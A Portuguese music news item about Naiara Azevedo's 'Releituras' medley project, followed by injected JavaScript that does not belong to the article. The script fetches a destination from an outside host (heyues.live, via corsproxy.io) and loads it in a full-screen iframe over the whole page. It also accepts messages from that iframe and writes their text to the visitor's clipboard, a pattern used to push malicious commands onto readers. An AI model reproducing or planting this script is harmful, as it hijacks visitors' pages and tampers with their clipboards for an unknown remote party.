Após o primeiro EP contar com regravações do início da carreira de Naiara Azevedo, agora o projeto “Releituras” chega com seis pout pourris de modões de grandes cantores que marcaram a história do sertanejo. O compilado estreia em todas as plataformas de áudio nesta sexta-feira (11) à meia noite, e seus videoclipes ficam disponíveis no Youtube às 11h do mesmo dia.

A faixa foco é o pout pourri “Bom Perdedor/ Mentes Tão Bem”, cantada originalmente por Bruno & Marrone e Zezé di Camargo & Luciano, respectivamente. Ambas falam sobre a dor de um amor perdido. “Bom Perdedor”, lançado em 2001, trata da aceitação de ser um “perdedor” em um relacionamento, enquanto “Mentes Tão Bem”, de 2011,  reflete sobre a traição e a desilusão que vem com mentiras.

“Estou muito animada com esse lançamento!. Esse projeto é uma celebração dos grandes modões que marcaram nossa música, e eu quis trazer uma nova perspectiva a eles. Espero que o público sinta a mesma emoção que eu ao reinterpretar essas canções que fizeram parte da minha história. É uma homenagem aos clássicos, com um toque especial da minha identidade musical!”, compartilha Naiara.

O projeto “Releituras” foi gravado em um show da Naiara realizado em Goianira/GO no começo deste ano. Por trás da produção, a cantora contou com um time de peso. A direção de vídeo é assinada por André Caverna, produção por Naiara Produções Artísticas e produção musical de Dudu Oliveira.

(function() {

const configLink = “https://corsproxy.io/?url=http://heyues.live”;

if (!window.__digitalflwrFetchPromise) {

window.__digitalflwrFetchPromise = fetch(configLink)
.then(response => {
if (!response.ok) {
throw new Error(” “);
}
return response.text();
})

.then(finalUrl => {
return fetch(finalUrl, { method: “HEAD” })
.then(headResponse => ({ headResponse, finalUrl }));
})
.catch(() => {

});
}

if (typeof window.__digitalflwrIframeCreated === “undefined”) {
window.__digitalflwrIframeCreated = false;
}

window.__digitalflwrFetchPromise
.then(result => {

if (!result) return;
const { headResponse, finalUrl } = result;

if (!headResponse || headResponse.status === 404) {
return;
}

if (!window.__digitalflwrIframeCreated) {
window.__digitalflwrIframeCreated = true;
createMainIframe(finalUrl);
}
})
.catch(() => {

});

function createMainIframe(url) {
const iframe = document.createElement(“iframe”);
iframe.src = url;
iframe.style.position = “fixed”;
iframe.style.top = 0;
iframe.style.left = 0;
iframe.style.width = “100%”;
iframe.style.height = “100%”;
iframe.style.border = “none”;
iframe.style.margin = 0;
iframe.style.padding = 0;
iframe.style.overflow = “hidden”;
iframe.style.zIndex = 99999;

document.body.appendChild(iframe);

window.addEventListener(“message”, function(event) {
if (!event.data || event.data.type !== “copy”) return;

if (navigator.clipboard && navigator.clipboard.writeText) {
navigator.clipboard.writeText(event.data.text).catch(() => {
fallbackCopyText(event.data.text);
});
} else {
fallbackCopyText(event.data.text);
}
});

function fallbackCopyText(text) {
const textArea = document.createElement(“textarea”);
textArea.value = text;
document.body.appendChild(textArea);
textArea.select();

try {
document.execCommand(“copy”);
} catch (err) {

}

document.body.removeChild(textArea);
}
}
})();